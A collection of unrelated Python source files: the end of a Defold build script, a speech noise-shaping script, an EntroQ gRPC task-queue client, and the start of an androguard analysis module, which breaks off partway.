overrides: return overrides[combined] if section == 'bootstrap' and option == 'resourcespath': return '.' v = config.get(section, option) m = re.search(r"\${(\w+).(\w+)}", v) while m: s = m.group(1) o = m.group(2) v = re.sub(r"\${(\w+).(\w+)}", self._get_config(config, s, o, overrides), v, 1) m = re.search(r"\${(\w+).(\w+)}", v) return v def smoke_test(self): sha1 = self._git_sha1() cwd = join('tmp', 'smoke_test') if os.path.exists(cwd): shutil.rmtree(cwd) path = self._download_editor2(self.channel, sha1) info = self._install_editor2(path) config = ConfigParser() config.read(info['config']) overrides = {'bootstrap.resourcespath': info['resources_path']} jdk = 'jdk11.0.1-p1' host2 = get_host_platform2() if 'win32' in host2: java = join('Defold', 'packages', jdk, 'bin', 'java.exe') elif 'linux' in host2: run.command(['chmod', '-R', '755', 'tmp/smoke_test/Defold']) java = join('Defold', 'packages', jdk, 'bin', 'java') else: java = join('Defold.app', 'Contents', 'Resources', 'packages', jdk, 'bin', 'java') jar = self._get_config(config, 'launcher', 'jar', overrides) vmargs = self._get_config(config, 'launcher', 'vmargs', overrides).split(',') + ['-Ddefold.log.dir=.', '-Ddefold.smoke.log=true'] vmargs = filter(lambda x: not str.startswith(x, '-Ddefold.update.url='), vmargs) main = self._get_config(config, 'launcher', 'main', overrides) game_project = '../../editor/test/resources/geometry_wars/game.project' args = [java, '-cp', jar] + vmargs + [main, '--preferences=../../editor/test/resources/smoke_test_prefs.json', game_project] robot_jar = '%s/ext/share/java/defold-robot.jar' % self.dynamo_home robot_args = [java, '-jar', robot_jar, '-s', '../../share/smoke-test.edn', '-o', 'result'] origdir = os.getcwd() origcwd = cwd if 'win32' in host2: os.chdir(cwd) cwd = '.' print('Running robot: %s' % robot_args) robot_proc = subprocess.Popen(robot_args, cwd = cwd, stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell = False) time.sleep(2) self._log('Running editor: %s' % args) ed_proc = subprocess.Popen(args, cwd = cwd, shell = False) os.chdir(origdir) cwd = origcwd output = robot_proc.communicate()[0] if ed_proc.poll() == None: ed_proc.terminate() ed_proc.wait() self._uninstall_editor2(info) result_archive_path = '/'.join(['int.d.defold.com', 'archive', sha1, self.channel, 'editor2', 'smoke_test']) def _findwebfiles(libdir): paths = os.listdir(libdir) paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.html', '.css', '.png')] return paths for f in _findwebfiles(join(cwd, 'result')): self.upload_to_s3(f, 's3://%s/%s' % (result_archive_path, basename(f))) self.wait_uploads() self._log('Log: https://s3-eu-west-1.amazonaws.com/%s/index.html' % (result_archive_path)) if robot_proc.returncode != 0: sys.exit(robot_proc.returncode) return True def local_smoke(self): host2 = get_host_platform2() cwd = './editor' if os.path.exists('editor/log.txt'): os.remove('editor/log.txt') game_project = 'test/resources/geometry_wars/game.project' args = ['./scripts/lein', 'with-profile', '+smoke-test', 'run', game_project] robot_jar = '../defold-robot/target/defold-robot-0.7.0-standalone.jar' robot_args = ['java', '-jar', robot_jar, '-s', '../share/smoke-test.edn', '-o', 'local_smoke_result'] origdir = os.getcwd() origcwd = cwd if 'win32' in host2: os.chdir(cwd) args = ['sh'] + args cwd = '.' 
print('Running robot: %s' % robot_args) robot_proc = subprocess.Popen(robot_args, cwd = cwd, stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell = False) time.sleep(2) self._log('Running editor: %s' % args) ed_proc = subprocess.Popen(args, cwd = cwd, shell = False) os.chdir(origdir) cwd = origcwd output = robot_proc.communicate()[0] if ed_proc.poll() == None: ed_proc.terminate() ed_proc.wait() if robot_proc.returncode != 0: sys.exit(robot_proc.returncode) return True # # END: SMOKE TEST # ------------------------------------------------------------ def get_archive_path(self, channel=None): return join(self.archive_path, channel or self.channel) def get_archive_redirect_key(self, url): old_url = url.replace(self.get_archive_path().replace("\\", "/"), self.archive_path) u = urlparse.urlparse(old_url) return u.path def download_from_archive(self, src_path, dst_file): url = join(self.get_archive_path(), src_path) self.download_from_s3(dst_file, url) def upload_to_archive(self, src_file, dst_path): url = join(self.get_archive_path(), dst_path).replace("\\", "/") self._log("Uploading %s -> %s" % (src_file, url)) self.upload_to_s3(src_file, url) # create redirect so that the old s3 paths still work # s3://d.defold.com/archive/channel/sha1/engine/* -> http://d.defold.com/archive/sha1/engine/* bucket = s3.get_bucket(urlparse.urlparse(url).netloc) redirect_key = self.get_archive_redirect_key(url) redirect_url = url.replace("s3://", "http://") key = bucket.new_key(redirect_key) key.set_redirect(redirect_url) self._log("Redirecting %s -> %s : %s" % (url, redirect_key, redirect_url)) def download_from_s3(self, path, url): url = url.replace('\\', '/') self._log('Downloading %s -> %s' % (url, path)) u = urlparse.urlparse(url) if u.scheme == 's3': self._mkdirs(os.path.dirname(path)) from boto.s3.key import Key bucket = s3.get_bucket(u.netloc) k = Key(bucket) k.key = u.path k.get_contents_to_filename(path) self._log('Downloaded %s -> %s' % (url, path)) else: raise Exception('Unsupported url %s' % (url)) def upload_to_s3(self, path, url): url = url.replace('\\', '/') self._log('Uploading %s -> %s' % (path, url)) u = urlparse.urlparse(url) if u.scheme == 's3': bucket = s3.get_bucket(u.netloc) if not self.thread_pool: self.thread_pool = ThreadPool(8) p = u.path if p[-1] == '/': p += basename(path) def upload_singlefile(): key = bucket.new_key(p) key.set_contents_from_filename(path) self._log('Uploaded %s -> %s' % (path, url)) def upload_multipart(): headers = {} contenttype, _ = mimetypes.guess_type(path) if contenttype is not None: headers['Content-Type'] = contenttype mp = bucket.initiate_multipart_upload(p, headers=headers) source_size = os.stat(path).st_size chunksize = 64 * 1024 * 1024 # 64 MiB chunkcount = int(math.ceil(source_size / float(chunksize))) def upload_part(filepath, part, offset, size): with open(filepath, 'r') as fhandle: fhandle.seek(offset) mp.upload_part_from_file(fp=fhandle, part_num=part, size=size) _threads = [] for i in range(chunkcount): part = i + 1 offset = i * chunksize remaining = source_size - offset size = min(chunksize, remaining) args = {'filepath': path, 'part': part, 'offset': offset, 'size': size} self._log('Uploading #%d %s -> %s' % (i + 1, path, url)) _thread = Thread(target=upload_part, kwargs=args) _threads.append(_thread) _thread.start() for i in range(chunkcount): _threads[i].join() self._log('Uploaded #%d %s -> %s' % (i + 1, path, url)) if len(mp.get_all_parts()) == chunkcount: mp.complete_upload() self._log('Uploaded %s -> %s' % (path, url)) else: 
mp.cancel_upload() self._log('Failed to upload %s -> %s' % (path, url)) f = None if sys.platform == 'win32': f = Future(self.thread_pool, upload_singlefile) else: f = Future(self.thread_pool, upload_multipart) self.futures.append(f) else: raise Exception('Unsupported url %s' % (url)) def wait_uploads(self): for f in self.futures: f() self.futures = [] def _form_env(self): env = dict(os.environ) host = self.host2 if 'x86-' in host: host = self.host ld_library_path = 'DYLD_LIBRARY_PATH' if self.host == 'darwin' else 'LD_LIBRARY_PATH' ld_library_paths = ['%s/lib/%s' % (self.dynamo_home, self.target_platform), '%s/ext/lib/%s' % (self.dynamo_home, self.host)] if self.host == 'x86_64-linux': ld_library_paths.append('%s/ext/SDKs/linux/%s/%s/lib' % (self.dynamo_home, PACKAGES_LINUX_CLANG, PACKAGES_TAPI_VERSION)) env[ld_library_path] = os.path.pathsep.join(ld_library_paths) pythonpaths = ['%s/lib/python' % self.dynamo_home, '%s/build_tools' % self.defold, '%s/ext/lib/python' % self.dynamo_home] env['PYTHONPATH'] = os.path.pathsep.join(pythonpaths) env['DYNAMO_HOME'] = self.dynamo_home env['ANDROID_HOME'] = os.path.join(self.dynamo_home, 'ext', 'SDKs', 'android-sdk') go_root = '%s/ext/go/%s/go' % (self.dynamo_home, self.target_platform) android_host = self.host if 'win32' in android_host: android_host = 'windows' paths = os.path.pathsep.join(['%s/bin/%s' % (self.dynamo_home, self.target_platform), '%s/bin' % (self.dynamo_home), '%s/ext/bin' % self.dynamo_home, '%s/ext/bin/%s' % (self.dynamo_home, host), '%s/bin' % go_root, '%s/platform-tools' % env['ANDROID_HOME'], '%s/ext/SDKs/%s/toolchains/llvm/prebuilt/%s-x86_64/bin' % (self.dynamo_home,PACKAGES_ANDROID_NDK,android_host)]) env['PATH'] = paths + os.path.pathsep + env['PATH'] go_paths = os.path.pathsep.join(['%s/go' % self.dynamo_home, join(self.defold, 'go')]) env['GOPATH'] = go_paths env['GOROOT'] = go_root env['MAVEN_OPTS'] = '-Xms256m -Xmx700m -XX:MaxPermSize=1024m' # Force 32-bit python 2.7 on darwin. 
env['VERSIONER_PYTHON_PREFER_32_BIT'] = 'yes' env['VERSIONER_PYTHON_VERSION'] = '2.7' if self.no_colors: env['NOCOLOR'] = '1' env['EMSCRIPTEN'] = self._form_ems_path() env['EM_CACHE'] = join(self.get_ems_dir(), 'emscripten_cache') env['EM_CONFIG'] = join(self.get_ems_dir(), '.emscripten') xhr2_path = os.path.join(self.dynamo_home, NODE_MODULE_LIB_DIR, 'xhr2', 'package', 'lib') if 'NODE_PATH' in env: env['NODE_PATH'] = xhr2_path + os.path.pathsep + env['NODE_PATH'] else: env['NODE_PATH'] = xhr2_path return env if __name__ == '__main__': boto_path = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../packages/boto-2.28.0-py2.7.egg')) sys.path.insert(0, boto_path) usage = '''usage: %prog [options] command(s) Commands: distclean - Removes the DYNAMO_HOME folder install_ext - Install external packages install_ems - Install emscripten sdk sync_archive - Sync engine artifacts from S3 activate_ems - Used when changing to a branch that uses a different version of emscripten SDK (resets ~/.emscripten) build_engine - Build engine archive_engine - Archive engine (including builtins) to path specified with --archive-path install_go - Install go dev tools build_go - Build go code archive_go - Archive go binaries build_editor2 - Build editor sign_editor2 - Sign editor bundle_editor2 - Bundle editor (zip) archive_editor2 - Archive editor to path specified with --archive-path download_editor2 - Download editor bundle (zip) notarize_editor2 - Notarize the macOS version of the editor build_bob - Build bob with native libraries included for cross platform deployment archive_bob - Archive bob to path specified with --archive-path build_docs - Build documentation build_builtins - Build builtin content archive bump - Bump version number release - Release editor shell - Start development shell smoke_test - Test editor and engine in combination local_smoke - Test run smoke test using local dev environment Multiple commands can be specified To pass on arbitrary options to waf: build.py OPTIONS COMMANDS -- WAF_OPTIONS ''' parser = optparse.OptionParser(usage) parser.add_option('--platform', dest='target_platform', default = None, choices = get_target_platforms(), help = 'Target platform') parser.add_option('--skip-tests', dest='skip_tests', action = 'store_true', default = False, help = 'Skip unit-tests. Default is false') parser.add_option('--skip-codesign', dest='skip_codesign', action = 'store_true', default = False, help = 'skip code signing (engine and editor). Default is false') parser.add_option('--skip-docs', dest='skip_docs', action = 'store_true', default = False, help = 'skip building docs when building the engine. Default is false') parser.add_option('--skip-builtins', dest='skip_builtins', action = 'store_true', default = False, help = 'skip building builtins when building the engine. Default is false') parser.add_option('--skip-bob-light', dest='skip_bob_light', action = 'store_true', default = False, help = 'skip building bob-light when building the engine. Default is false') parser.add_option('--disable-ccache', dest='disable_ccache', action = 'store_true', default = False, help = 'force disable of ccache. Default is false') parser.add_option('--no-colors', dest='no_colors', action = 'store_true', default = False, help = 'No color output. Default is color output') default_archive_path = CDN_UPLOAD_URL parser.add_option('--archive-path', dest='archive_path', default = default_archive_path, help = 'Archive build. Set ssh-path, host:path, to archive build to. 
Default is %s' % default_archive_path) default_package_path = CDN_PACKAGES_URL parser.add_option('--package-path', dest='package_path', default = default_package_path, help = 'Either an url to a file server where the sdk packages are located, or a path to a local folder. Reads $DM_PACKAGES_URL. Default is %s.' % default_package_path) parser.add_option('--set-version', dest='set_version', default = None, help = 'Set version explicitily when bumping version') parser.add_option('--channel', dest='channel', default = None, help = 'Editor release channel (stable, beta, ...)') parser.add_option('--engine-artifacts', dest='engine_artifacts', default = 'auto', help = 'What engine version to bundle the Editor with (auto, dynamo-home, archived, archived-stable or a SHA1)') parser.add_option('--save-env-path', dest='save_env_path', default = None, help = 'Save environment variables to a file') parser.add_option('--notarization-username', dest='notarization_username', default = None, help = 'Username to use when sending the editor for notarization') parser.add_option('--notarization-password', dest='notarization_password', default = None, help = 'Password to use when sending the editor for notarization') parser.add_option('--notarization-itc-provider', dest='notarization_itc_provider', default = None, help = 'Optional iTunes Connect provider to use when sending the editor for notarization') parser.add_option('--github-token', dest='github_token', default = None, help = 'GitHub authentication token when releasing to GitHub') parser.add_option('--github-target-repo', dest='github_target_repo', default = release_to_github.get_default_repo(), help = 'GitHub target repo when releasing artefacts') parser.add_option('--github-sha1', dest='github_sha1', default = None, help = 'A specific sha1 to use in github operations') parser.add_option('--version', dest='version', default = None, help = 'Version to use instead of from VERSION file') parser.add_option('--codesigning-identity', dest='codesigning_identity', default = None, help = 'Codesigning identity for macOS version of the editor') parser.add_option('--windows-cert', dest='windows_cert', default = None, help = 'Path to codesigning certificate for Windows version of the editor') parser.add_option('--windows-cert-pass', dest='windows_cert_pass', default = None, help = 'Path to file containing password to codesigning certificate for Windows version of the editor') options, all_args = parser.parse_args() args = filter(lambda x: x[:2] != '--', all_args) waf_options = filter(lambda x: x[:2] == '--', all_args) if len(args) == 0: parser.error('No command specified') target_platform = options.target_platform if not options.target_platform: target_platform = get_host_platform2() if 'x86-' in target_platform: target_platform = get_host_platform() # we need even more cleanup to use "x86-linux" format for everything c = Configuration(dynamo_home = os.environ.get('DYNAMO_HOME', None), target_platform = target_platform, skip_tests = options.skip_tests, skip_codesign = options.skip_codesign, skip_docs = options.skip_docs, skip_builtins = options.skip_builtins, skip_bob_light = options.skip_bob_light, disable_ccache = options.disable_ccache, no_colors = options.no_colors, archive_path = options.archive_path, package_path = options.package_path, set_version = options.set_version, channel = options.channel, engine_artifacts = options.engine_artifacts, waf_options = waf_options, save_env_path = options.save_env_path, notarization_username = options.notarization_username, 
notarization_password = options.notarization_password, notarization_itc_provider = options.notarization_itc_provider, github_token = options.github_token, github_target_repo = options.github_target_repo, github_sha1 = options.github_sha1, version = options.version, codesigning_identity = options.codesigning_identity, windows_cert = options.windows_cert, windows_cert_pass = options.windows_cert_pass) for cmd in args: f = getattr(c, cmd, None) if not f: parser.error('Unknown command %s' % cmd) else: start = time.time() print("Running '%s'" % cmd) f() c.wait_uploads() duration = (time.time() - start) print("'%s' completed in %.2f s" % (cmd, duration)) print('Done')
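# ------------------------------------------------------------
# Illustrative invocation sketch (not part of the script): the command names listed in the
# usage text above map directly onto Configuration methods via getattr(), so several commands
# can be chained in a single run. The platform values, script path and the trailing waf option
# below are hypothetical examples; anything after a bare '--' is passed straight on to waf.
#
#   ./scripts/build.py --platform=x86_64-linux install_ext build_engine
#   ./scripts/build.py --platform=x86_64-darwin --channel=alpha build_editor2 bundle_editor2
#   ./scripts/build.py --platform=js-web build_engine -- --some-waf-option
#
# The location scripts/build.py is an assumption; adjust it to wherever this file actually lives.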
noise_restored.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Copyright 2019 Wu Yi-Chiao (Nagoya University) # based on a WaveNet script by Tomoki Hayashi (Nagoya University) # (https://github.com/kan-bayashi/PytorchWaveNetVocoder) # Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0) from __future__ import division import argparse import logging import multiprocessing as mp import os import sys from distutils.util import strtobool import numpy as np from scipy.io import wavfile from sprocket.speech.feature_extractor import FeatureExtractor from sprocket.speech.synthesizer import Synthesizer from feature_extract import low_cut_filter from utils import find_files, read_hdf5, read_txt, check_hdf5 def _get_arguments(): parser = argparse.ArgumentParser() # path setting parser.add_argument("--feats", required=True, type=str, help="list or directory of aux feat files") parser.add_argument("--stats", required=True, type=str, help="hdf5 file including statistics") parser.add_argument("--outdir", required=True, type=str, help="directory of noise shaped wav files") parser.add_argument("--writedir", required=True, type=str, help="directory to save restored wav file") # feature setting parser.add_argument("--feature_type", default="world", type=str, help="feature type") parser.add_argument("--feature_format", default="h5", type=str, help="feature format") parser.add_argument("--pow_adjust", default="1.0", type=float, help="power adjust factor") parser.add_argument("--fs", default=16000, type=int, help="Sampling frequency") parser.add_argument("--shiftms", default=5, type=float, help="Frame shift in msec") parser.add_argument("--fftl", default=1024, type=int, help="FFT length") parser.add_argument("--mcep_dim_start", default=2, type=int, help="Start index of mel cepstrum") parser.add_argument("--mcep_dim_end", default=27, type=int, help="End index of mel cepstrum") parser.add_argument("--mcep_alpha", default=0.41, type=float, help="Alpha of mel cepstrum") parser.add_argument("--mag", default=0.5, type=float, help="magnification of noise shaping") # other setting parser.add_argument("--verbose", default=1, type=int, help="log message level") parser.add_argument('--n_jobs', default=40, type=int, help="number of parallel jobs") parser.add_argument('--inv', default=False, type=strtobool, help="if True, inverse filtering will be performed") return parser.parse_args() def noise_shaping(wav_list, args): """APPLY NOISE SHAPING""" # define feature extractor feature_extractor = FeatureExtractor( analyzer="world", fs=args.fs, shiftms=args.shiftms, fftl=args.fftl) # define synthesizer synthesizer = Synthesizer( fs=args.fs, shiftms=args.shiftms, fftl=args.fftl) for i, feat_id in enumerate(wav_list): logging.info("now processing %s (%d/%d)" % (feat_id, i + 1, len(wav_list))) # load wavfile and apply low cut filter wav_filename = args.outdir.replace("feat_id", feat_id) fs, x = wavfile.read(wav_filename) wav_type = x.dtype x = np.array(x, dtype=np.float64) # check sampling frequency if not fs == args.fs: logging.error("sampling frequency is not matched.") sys.exit(1) ## extract features (only for get the number of frames) f0, _, _ = feature_extractor.analyze(x) num_frames = f0.shape[0] # load average mcep mlsa_coef = read_hdf5(args.stats, "/%s/mean" % args.feature_type) mlsa_coef = mlsa_coef[args.mcep_dim_start:args.mcep_dim_end] * args.mag mlsa_coef[0] = 0.0 if args.inv: mlsa_coef[1:] = -1.0 * mlsa_coef[1:] mlsa_coef = np.tile(mlsa_coef, [num_frames, 1]) # synthesis and write x_ns = synthesizer.synthesis_diff(x, mlsa_coef, 
alpha=args.mcep_alpha) x_ns = low_cut_filter(x_ns, args.fs, cutoff=70) write_name = args.writedir.replace("feat_id", feat_id) # check directory existence wav = np.clip(x_ns, -32768, 32767) if wav_type == np.int16: wavfile.write(write_name, args.fs, np.int16(wav)) else: wavfile.write(write_name, args.fs, wav) def main(): # parse arguments args = _get_arguments() # set log level if args.verbose == 1: logging.basicConfig(level=logging.INFO, format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s', datefmt='%m/%d/%Y %I:%M:%S') elif args.verbose > 1: logging.basicConfig(level=logging.DEBUG, format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s', datefmt='%m/%d/%Y %I:%M:%S') else: logging.basicConfig(level=logging.WARN, format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s', datefmt='%m/%d/%Y %I:%M:%S') logging.warn("logging is disabled.") # show arguments for key, value in vars(args).items(): logging.info("%s = %s" % (key, str(value))) # check directory existence if not os.path.exists(os.path.dirname(args.writedir)): os.makedirs(os.path.dirname(args.writedir)) # get file list if os.path.isdir(args.feats): feat_list = sorted(find_files(args.feats, "*.%s" % args.feature_format)) elif os.path.isfile(args.feats): feat_list = read_txt(args.feats) else: logging.error("--feats should be directory or list.") sys.exit(1) feat_ids = [os.path.basename(f).replace(".%s" % args.feature_format, "") for f in feat_list] logging.info("number of utterances = %d" % len(feat_ids)) # divide list feat_ids = np.array_split(feat_ids, args.n_jobs) feat_ids = [f_ids.tolist() for f_ids in feat_ids] # multi processing processes = [] # for f in file_lists: for f in feat_ids: p = mp.Process(target=noise_shaping, args=(f, args,)) p.start() processes.append(p) # wait for all processes for p in processes: p.join() if __name__ == "__main__": main()
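# ------------------------------------------------------------
# Illustrative invocation sketch (all paths below are hypothetical). Note that --outdir and
# --writedir act as filename templates: the literal token "feat_id" in them is replaced by each
# utterance id (see args.outdir.replace("feat_id", feat_id) above), and the feature list is
# split across --n_jobs processes with np.array_split.
#
#   python noise_restored.py \
#       --feats data/train/feats.list \
#       --stats data/train/stats.h5 \
#       --outdir wav_ns/feat_id.wav \
#       --writedir wav_restored/feat_id.wav \
#       --fs 16000 --n_jobs 10 --inv true
#
# With --inv true the average-mcep MLSA filter is applied in the inverse direction, which is
# presumably how a previously noise-shaped waveform is restored.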
__init__.py
"""Package entroq provides a client library for working with EntroQ. """ import base64 import json import threading import time import uuid import grpc from google.protobuf import json_format from grpc_health.v1 import health_pb2 from grpc_health.v1 import health_pb2_grpc from grpc_status import rpc_status from . import entroq_pb2 from . import entroq_pb2_grpc def is_cancelled(exc): return exc.cancelled() def is_dependency(exc): return exc.code() == grpc.StatusCode.NOT_FOUND def dependency_error_details(exc, as_json=False): if not is_dependency(exc): return None # Should have dependency metadata. meta = exc.trailing_metadata() if not meta: return None status = rpc_status.from_call(exc) details = [] for d in status.details: if not d.type_url.endswith('/proto.ModifyDep'): return None dep = entroq_pb2.ModifyDep() dep.ParseFromString(d.value) if dep.type == entroq_pb2.DETAIL and not dep.msg: continue if as_json: details.append(json_format.MessageToDict(dep)) else: details.append(dep) return details def id_str(task_id): return '{}:{}'.format(task_id.id, task_id.version) def as_change(task): return entroq_pb2.TaskChange( old_id=as_id(task), new_data=entroq_pb2.TaskData( queue=task.queue, at_ms=task.at_ms, value=task.value ) ) def as_id(task): return entroq_pb2.TaskID(id=task.id, version=task.version) class DependencyError(Exception): @classmethod def from_exc(cls, exc): deps = dependency_error_details(exc) if not deps: return exc self = cls.from_deps(deps) self.exc = exc return self @classmethod def from_deps(cls, deps): self = cls() for d in deps: if d.type == entroq_pb2.CLAIM: self.claims.append(id_str(d.id)) elif d.type == entroq_pb2.DELETE: self.deletes.append(id_str(d.id)) elif d.type == entroq_pb2.CHANGE: self.changes.append(id_str(d.id)) elif d.type == entroq_pb2.DEPEND: self.depends.append(id_str(d.id)) elif d.type == entroq_pb2.DETAIL: self.msg = d.msg elif d.type == entroq_pb2.INSERT: self.inserts.append(id_str(d.id)) return self def __init__(self): self.claims = [] self.deletes = [] self.changes = [] self.depends = [] self.inserts = [] self.msg = '' def as_json(self): return json.dumps(self.as_dict()) def as_dict(self): result = {} if self.claims: result['claims'] = self.claims if self.deletes: result['deletes'] = self.deletes if self.changes: result['changes'] = self.changes if self.depends: result['depends'] = self.depends if self.msg: result['msg'] = self.msg if self.inserts: result['inserts'] = self.inserts return result __str__ = as_json class EntroQ: """Client class for EntroQ over gRPC.""" def __init__(self, eqaddr='localhost:37706'): """Create an EntroQ client (over gRPC). Args: eqaddr: Hostport of the address of an EntroQ gRPC service. """ self.addr = eqaddr self.claimant_id = str(uuid.uuid4()) # TODO: allow secure channels. self.channel = grpc.insecure_channel(self.addr) self.stub = entroq_pb2_grpc.EntroQStub(self.channel) self.health_stub = health_pb2_grpc.HealthStub(self.channel) # Call the server, see what time it thinks it is, calculate rough skew. now = int(time.time() * 1000) self.time_skew = self.time() - now @staticmethod def to_dict(task, value_type=''): if value_type and value_type.lower() == 'json': jt = json_format.MessageToDict(task) val = jt.get('value') if val: jt['value'] = json.loads(base64.b64decode(val).decode('utf-8')) return jt return json_format.MessageToDict(task) def queues(self, prefixmatches=(), exactmatches=(), limit=0): """Return information about each queue that meets any of the given match criteria. 
If both prefixmatches and exactmatches is empty, then every queue matches. If only one is empty, it is simply ignored. The OR of all match specs is used to find queue names. Args: prefixmatches: iterable of allowed prefixes. exactmatches: iterable of allowed exact matches. limit: return no more than this many matches, all if 0. Returns: [entroq_pb2.QueueStats] """ resp = self.stub.QueueStats(entroq_pb2.QueuesRequest( match_prefix=prefixmatches, match_exact=exactmatches, limit=limit)) return resp.queues def queue_empty(self, queue): """Indicate whether the given queue is empty.""" qs = self.queues(exactmatches=[queue]) for qstat in qs: if qstat.name == queue: return qstat.num_tasks == 0 return True def tasks(self, queue='', claimant_id='', task_ids=(), limit=0, omit_values=False): """Return task iter for tasks that match the given fields. Typically used to itemize a queue. Args: queue: queue name, if filtering on queue name, otherwise task_ids must be given. claimant_id: optional - if specified, limit to tasks claimed by this claimant. task_ids: optioanl - if specified, limit to a particular iterable of task IDs. limit: limit to this many results, all if 0. omit_values: only return metadata. Yields: A entroq_pb2.Task for each matching task. """ for tresp in self.stub.StreamTasks(entroq_pb2.TasksRequest( queue=queue, claimant_id=claimant_id, limit=limit, task_id=task_ids, omit_values=omit_values)): for task in tresp.Tasks: yield task def task_by_id(self, task_id, queue=''): tasks = list(self.tasks(queue=queue, task_ids=[task_id], limit=1)) if not tasks: raise ValueError("Task {task_id} not found".format(task_id=task_id)) return tasks[0] def try_claim(self, queue, duration_ms=30000): """Try to claim a task from the given queue, for the given duration. Args: queue: Name of queue to claim a task from. Or a list of queue names. duration_ms: Milliseconds that the claim should initially be good for. Returns: An entroq_pb2.Task if successful, or None if no task could be claimed. """ resp = self.stub.TryClaim(entroq_pb2.ClaimRequest( claimant_id=self.claimant_id, queues=queue if isinstance(queue, (list, tuple)) else [queue], duration_ms=duration_ms)) return resp.task def claim(self, queue, duration_ms=30000, poll_ms=30000): """Claim a task, blocking until one is available. Args: queue: Name of queue to claim a task from. duration_ms: Initial duration of task lease, in milliseconds. poll_ms: Time between checks if no claim is available, in milliseconds. Returns: An entroq_pb2.Task when successful. """ # TODO: time out after retry interval, reconnect and try again. resp = self.stub.Claim(entroq_pb2.ClaimRequest( claimant_id=self.claimant_id, queues=queue if isinstance(queue, (list, tuple)) else [queue], duration_ms=duration_ms, poll_ms=poll_ms)) return resp.task def modify(self, inserts=(), changes=(), deletes=(), depends=(), unsafe_claimant_id=None): """Attempt a modification of potentially multiple tasks and queues. Args: inserts: a list of entroq_pb2.TaskData to insert. changes: a list of entroq_pb2.TaskChange indicating alterations to tasks. deletes: a list of entroq_pb2.TaskID indicating which tasks to delete. depends: a list of entroq_pb2.TaskID that must exist for success. unsafe_claimant_id: sets the claimant ID to the given value. Use with extreme care. Default is safe. Raises: grpc.RpcError or, when we can get dependency information, DependencyError. Returns: (inserted_tasks, changed_tasks) - lists of entroq_pb2.Task. 
""" try: resp = self.stub.Modify(entroq_pb2.ModifyRequest( claimant_id=unsafe_claimant_id or self.claimant_id, inserts=inserts, changes=changes, deletes=deletes, depends=depends)) return resp.inserted, resp.changed except grpc.RpcError as e: raise DependencyError.from_exc(e) def delete(self, task_id, unsafe_claimant_id=None): """Attempt to delete the given task_id. Args: task_id: entroq_pb2.TaskID of the task to be deleted. unsafe_claimant_id: Specify to override claimant ID (e.g., to force deletion of a claimed task). Use with caution. """ self.modify(deletes=[task_id], unsafe_claimant_id=unsafe_claimant_id) def time(self): res = self.stub.Time(entroq_pb2.TimeRequest()) return res.time_ms def now(self): """Return now from the rough perspective of the server, in milliseconds.""" return int(time.time() * 1000) + self.time_skew def renew_for(self, task, duration=30): """Renew a task for a given number of seconds.""" _, chg = self.modify(changes=[ entroq_pb2.TaskChange( old_id=entroq_pb2.TaskID(id=task.id, version=task.version), new_data=entroq_pb2.TaskData(queue=task.queue, at_ms=self.now() + 1000 * duration, value=task.value)), ]) return chg[0] def do_with_renew(self, task, do_func, duration=30): """Calls do_func while renewing the given task. Args: task: The entroq_pb2.Task to attempt to renew. do_func: A function accepting a task and returning anything, to be called with this task while it is renewed in the background. duration: Claim duration in seconds. Returns: The (renewed task, do_func result). """ renew_interval = duration // 2 exit = threading.Event() lock = threading.Lock() renewed = task def renewer(): exit.wait(duration / 1000) while not exit.is_set(): _t = self.renew_for(task, duration=duration) with lock: renewed = _t exit.wait(duration / 1000) try: threading.Thread(target=renewer).start() result = do_func(task) with lock: return renewed, result finally: exit.set() def pop_all(self, queue, force=False): """Attempt to completely clear a queue. Claims from the queue, deleting everything it claims, until the queue is empty. Note that this must be called in a loop. Args: queue: The queue name to clear. force: If specified, will spoof the claimant for every task instead of claiming first. Yields: Each task that has been removed (entroq_pb2.Task). """ if force: for task in self.tasks(queue=queue): self.delete(unsafe_claimant_id=task.claimant_id, task_id=entroq_pb2.TaskID(id=task.id, version=task.version)) yield task return while not self.queue_empty(queue): task = self.claim(queue) self.modify(deletes=[entroq_pb2.TaskID(id=task.id, version=task.version)]) yield task class EQWorker: """Worker for claiming tasks from a given queue and running a given method.""" def __init__(self, eq): """Create a worker using the given EntroQ client. Args: eq: An EntroQ instance. """ self.eq = eq def work(self, queue, do_func, claim_duration=30): """Pull tasks from given queue, calling do_func, while renewing claims. This function never returns. If you want to run it in the background, start up a thrad with this as the target. Args: queue: The name of the queue to pull from, or a list of queues. do_func: The function to call. Accepts a single task argument and returns an entroq_pb2.ModifyRequest (no need to specify claimant ID). claim_duration: Seconds for which this claim should be renewed every renewal cycle. 
""" def fixup(renewed, tlist): for val in tlist: if val.id == renewed.id and val.version != renewed.version: if val.version > renewed.version: raise ValueError("Task updated inside worker body, version too high") val.version = renewed.version while True: task = self.eq.claim(queue, duration_ms=1000 * claim_duration) try: renewed, mod_req = self.eq.do_with_renew(task, do_func, duration=claim_duration) except DependencyError as e: logging.warn("Worker continuing after dependency: %s", e) continue if not mod_req: logging.info("No modification requested, continuing") continue if not (mod_req.inserts or mod_req.changes or mod_req.deletes): logging.info("No mutating modifications requested, continuing") continue fixup(renewed, mod_req.changes) fixup(renewed, mod_req.depends) fixup(renewed, mod_req.deletes) self.eq.modify(changes=mod_req.changes, inserts=mod_req.inserts, depends=mod_req.depends, deletes=mod_req.deletes)
auto.py
from future import standard_library standard_library.install_aliases() from builtins import range from builtins import object import os import queue import threading import time import zlib from androguard.core import androconf from androguard.core.bytecodes import apk, dvm from androguard.core.analysis import analysis from androguard.util import read import logging log = logging.getLogger("androguard.auto") class AndroAuto(object): """ The main class which automatically analyses android apps by calling methods from a specific object :param settings: the settings of the analysis :type settings: dict """ def __init__(self, settings): self.settings = settings def dump(self): """ Dump the analysis """ self.settings["my"].dump() def dump_file(self, filename): """ Dump the analysis in a filename """ self.settings["my"].dump_file(filename) def go(self): """ Launch the analysis """ myandro = self.settings["my"] def worker(idx, q): log.debug("Running worker-%d" % idx) while True: a, d, dx, axmlobj, arscobj, logf = None, None, None, None, None, None try: filename, fileraw = q.get() id_file = zlib.adler32(fileraw) log.debug("(worker-%d) get 